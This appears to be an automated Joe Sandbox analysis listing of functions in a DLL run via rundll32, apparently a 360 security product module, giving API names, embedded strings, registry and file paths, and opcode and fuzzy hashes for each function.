                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: 479d6b322858d1b6fb9b2a33bd2b2862127450e003e1d21a635a901cbd1a60b9
                                                                                                  • Instruction ID: d0fbe37a2b12f24882e89a36d068dfa1d6ae687bd891c2bf64f12d69b9b9f573
                                                                                                  • Opcode Fuzzy Hash: 479d6b322858d1b6fb9b2a33bd2b2862127450e003e1d21a635a901cbd1a60b9
                                                                                                  • Instruction Fuzzy Hash: 88318B36602B189AFF8ADFD1D9543B823A1FF88B86F198514DA670B554CF38C698C341
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                                    • Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
                                                                                                    • Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
                                                                                                    • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
                                                                                                    • Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
                                                                                                    • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A
                                                                                                  • RegCloseKey.ADVAPI32 ref: 0000000180056B49
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AppendPath$CloseFileHeapModuleNameProcess_wcsicmpmemset
                                                                                                  • String ID: 360EntSecurity$360Safe$?$SOFTWARE\$SOFTWARE\Wow6432Node\
                                                                                                  • API String ID: 2226481571-3054377637
                                                                                                  • Opcode ID: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                                                  • Instruction ID: 5d79a3dbe08d97a28ec647ffc4188a53122dfd3fad7d09cd3595c12d58dad182
                                                                                                  • Opcode Fuzzy Hash: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                                                  • Instruction Fuzzy Hash: 211261B2701A4886EB419B69C8413DD73A1FB85BF4F448711AA3D977E5DF78CA89C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLSID$FILETYPE
                                                                                                  • API String ID: 0-673176369
                                                                                                  • Opcode ID: 4c244d9c868472f455db6426f5af94abee75d2223c47d993bd46d00cae99b97c
                                                                                                  • Instruction ID: 664a91b93eddc4d250d885b2200669a72768227afd9472cb587bdefcc3a95370
                                                                                                  • Opcode Fuzzy Hash: 4c244d9c868472f455db6426f5af94abee75d2223c47d993bd46d00cae99b97c
                                                                                                  • Instruction Fuzzy Hash: CFF16B72615B8886EB92CF25E8407DD63A1F788BE4F149212FE5D43B99DF78CA44C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeString$??2@??3@_wtoi
                                                                                                  • String ID: //reccfg/wndclass
                                                                                                  • API String ID: 1119205991-3779619899
                                                                                                  • Opcode ID: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                                                  • Instruction ID: aac1c87dd54dd223690f6a51cef8bcee3ce48f855a47f00273c96f55abf577db
                                                                                                  • Opcode Fuzzy Hash: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                                                  • Instruction Fuzzy Hash: D5B17A32701E489AEB81CF79C4803DC33A0F749B98F058626EA1E57B98DF38CA59C345
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$htonl$htonsmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 2604728826-0
                                                                                                  • Opcode ID: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
                                                                                                  • Instruction ID: c6a7ef21b5906d6b557d77442a06c91d81bd98b5ee7ca8850e16d0b233cac89c
                                                                                                  • Opcode Fuzzy Hash: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
                                                                                                  • Instruction Fuzzy Hash: 21B15B36704B848AE792CF61F48039EB7B5F748788F518015EE8917A98CF38D65DDB48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@?terminate@@$ErrorExceptionLastThrowmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 223594506-0
                                                                                                  • Opcode ID: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                                                  • Instruction ID: fcc32ee8dbcfcc96106fa9aa2d9edb036d58ed735eb2ced8cd8263455d285739
                                                                                                  • Opcode Fuzzy Hash: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                                                  • Instruction Fuzzy Hash: 0971E472210B8882EB559F19E8403DE6321FB8DBD4F608611FBAD47B96DF38C699C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value_errno$HeapProcess_time64
                                                                                                  • String ID: %s_count$%s_lasttime$CloudCfg
                                                                                                  • API String ID: 2146318826-610660357
                                                                                                  • Opcode ID: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
                                                                                                  • Instruction ID: 0a7454a278269eadbb0ffce7cefadb2dc21e45630bc3a54506c3f9663c92b6cc
                                                                                                  • Opcode Fuzzy Hash: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
                                                                                                  • Instruction Fuzzy Hash: DC819572215B4986EB91DB64D4807DE77A0F7887E4F508226FA5E437E9DF38CA48CB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Stream$??3@CreateFromLockSizeUnlock
                                                                                                  • String ID: __Location__
                                                                                                  • API String ID: 3539542440-1240413640
                                                                                                  • Opcode ID: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                                                  • Instruction ID: 0f7485e4f93bbca4fed8cf01455b67f1128db3508264a427a58b068d72c2ae23
                                                                                                  • Opcode Fuzzy Hash: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                                                  • Instruction Fuzzy Hash: A6818072700A4885EB46DB75D8403DC3761F749BE8F548216EA2E577E5DF34CA89C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$??3@memset$??2@CloseCreateHandleLocalReadSizeTimememmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1580871609-0
                                                                                                  • Opcode ID: 1ea34bf717c188f261df4d55dace50faf815ae1420c68309131a6986235bd89a
                                                                                                  • Instruction ID: 9ee3987d771936754bf2ec95240b51fbfdf566f0c87b186fa2af0a924239acdb
                                                                                                  • Opcode Fuzzy Hash: 1ea34bf717c188f261df4d55dace50faf815ae1420c68309131a6986235bd89a
                                                                                                  • Instruction Fuzzy Hash: B981AA32A00B489AE795DF69D5803ED33B0F748BDDF008215EE1A17A95EF34D6A9C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: tolower$__pctype_funclocaleconv
                                                                                                  • String ID: @$s
                                                                                                  • API String ID: 1428271734-3074397682
                                                                                                  • Opcode ID: 870097dd4b244917463ce528d91e901578feaee94ff52399b12698ab5ca81f40
                                                                                                  • Instruction ID: 6108c58a119eda9aeebc8c7cffb63edf03d10b724980f2cc7b0e25c2db6eeec6
                                                                                                  • Opcode Fuzzy Hash: 870097dd4b244917463ce528d91e901578feaee94ff52399b12698ab5ca81f40
                                                                                                  • Instruction Fuzzy Hash: 2381BFB2208B9886EBA68F29D0513ED7BA1E349BD4F14C116EB9957398DF3EC945C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1497570035-178107231
                                                                                                  • Opcode ID: 91aaae39f80d0418fd6fc02b66f74db7f1f6b55bc5cea72befadec07e3e486c7
                                                                                                  • Instruction ID: 551f47029daa90ee5f8560b06094b5e5181bcf51381db03c2015ed80f31b1854
                                                                                                  • Opcode Fuzzy Hash: 91aaae39f80d0418fd6fc02b66f74db7f1f6b55bc5cea72befadec07e3e486c7
                                                                                                  • Instruction Fuzzy Hash: B351E571306A5880FAB39B1A84253EA73A0A71DFE8F56C121EE5D077D2EF38C6498300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CharNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213498283-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: <?XML$<CHANNEL$>$HREF
                                                                                                  • API String ID: 0-1028254503
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Value$_time64$HeapProcess
                                                                                                  • String ID: %s_count$%s_lasttime$CloudCfg
                                                                                                  • API String ID: 1319719158-610660357
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: File$AppendCloseCreateHandleModuleNamePathReadSizememmove
                                                                                                  • String ID: ..\config\msgcenter64.dat
                                                                                                  • API String ID: 1552649294-925171115
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
                                                                                                  • String ID: safemon\360EDRSensor.exe
                                                                                                  • API String ID: 2297386589-1382049097
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
                                                                                                  • String ID: safemon\360ExtHost.exe
                                                                                                  • API String ID: 2297386589-1382862812
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AddressCloseHandleModuleOpenProc
                                                                                                  • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                  • API String ID: 823179699-3913318428
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AcquireContextCriticalCryptSection_time64$EnterErrorLastLeavememsetrandsrand
                                                                                                  • String ID:
                                                                                                  • API String ID: 1109857607-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$AddressEnterHandleLeaveModuleProc
                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                                  • API String ID: 3003946417-3900151262
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Window$ForegroundFromMonitor$Visible
                                                                                                  • String ID:
                                                                                                  • API String ID: 262661973-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Free$CloseHandleProcess$ExceptionLockMutexReleaseThrowUnlockWalk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2337826640-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: FreeString
                                                                                                  • String ID:
                                                                                                  • API String ID: 3341692771-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                                                  • String ID: L "$\\.\360SelfProtection
                                                                                                  • API String ID: 3778458602-907869749
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 652292005-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: wcsstr$_errnomemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 3323953840-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: combo$mid$product
                                                                                                  • API String ID: 0-992679775
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Deinstall$ProviderProvider32$CleanupStartup
                                                                                                  • String ID:
                                                                                                  • API String ID: 348239931-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  • Opcode ID: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                                                  • Instruction ID: b9a7bc9aefba1d0cd95c21a72bfdce90d94dfcaa7ac1bda6bd9d80d9113677c1
                                                                                                  • Opcode Fuzzy Hash: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                                                  • Instruction Fuzzy Hash: 55516032701B4882EB469F65D85039E73A0FB49FE4F098625EB69577D9DF38C649C380
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$AttributesFile$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2343307612-0
                                                                                                  • Opcode ID: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                                                  • Instruction ID: 3edc698dfee31cca13762dbc840380725e1013da3230f8d99093220343b8c6e9
                                                                                                  • Opcode Fuzzy Hash: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                                                  • Instruction Fuzzy Hash: 21515F32701B4882EB46DF65D85039D73A0FB49FA4F098225EB695B7E9DF38C949C380
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  • Opcode ID: cb084eac3c01a6141e65883699959179503f168564c67b856e8c6732f0b58ade
                                                                                                  • Instruction ID: 4743fcfbcc81e14f62b6d6540fd80bf8f8ac016693e437fee6067cb5d2a84381
                                                                                                  • Opcode Fuzzy Hash: cb084eac3c01a6141e65883699959179503f168564c67b856e8c6732f0b58ade
                                                                                                  • Instruction Fuzzy Hash: FE517E32701B4882EB469F65D85139E73A0FB49FE4F098225EB694B7E9DF38C549C380
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  • Opcode ID: c7e1832e4ce232530478fafb890d9703e0e225edfd70dbae23375beabdc7b3ab
                                                                                                  • Instruction ID: be5d86e730b1b0d67e88d66128df24a62b98fea8a3ed06798233462d938dce2e
                                                                                                  • Opcode Fuzzy Hash: c7e1832e4ce232530478fafb890d9703e0e225edfd70dbae23375beabdc7b3ab
                                                                                                  • Instruction Fuzzy Hash: E7518E72701B4882EB429F65D85139E73A0FB49FE4F098225EB295B7E9DF38C549C380
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpimemset
                                                                                                  • String ID: ShellEx\IconHandler$\DefaultIcon$clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\${42042206-2D85-11D3-8CFF-005004838597}
                                                                                                  • API String ID: 3784069311-1340094651
                                                                                                  • Opcode ID: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                                                  • Instruction ID: 9f0af0b831dc55336fcff299f0060eabbe44d87f67dffe850d980bb31fffbbb0
                                                                                                  • Opcode Fuzzy Hash: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                                                  • Instruction Fuzzy Hash: 0251A672601E4982EB52DB29D8817DE6760FB897F4F508312FA6D436E5DF38C689C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
                                                                                                  • String ID:
                                                                                                  • API String ID: 3103530258-0
                                                                                                  • Opcode ID: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                                                  • Instruction ID: b0c21a69e9994dd49745b429a24057b93f4d6bf7018e4c24e81fb4468a7e2a6c
                                                                                                  • Opcode Fuzzy Hash: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                                                  • Instruction Fuzzy Hash: 0051AF32711A4882EB82CF29D8843DE7761F789BE8F549211FE69176A5DF39C64AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
                                                                                                  • String ID:
                                                                                                  • API String ID: 3103530258-0
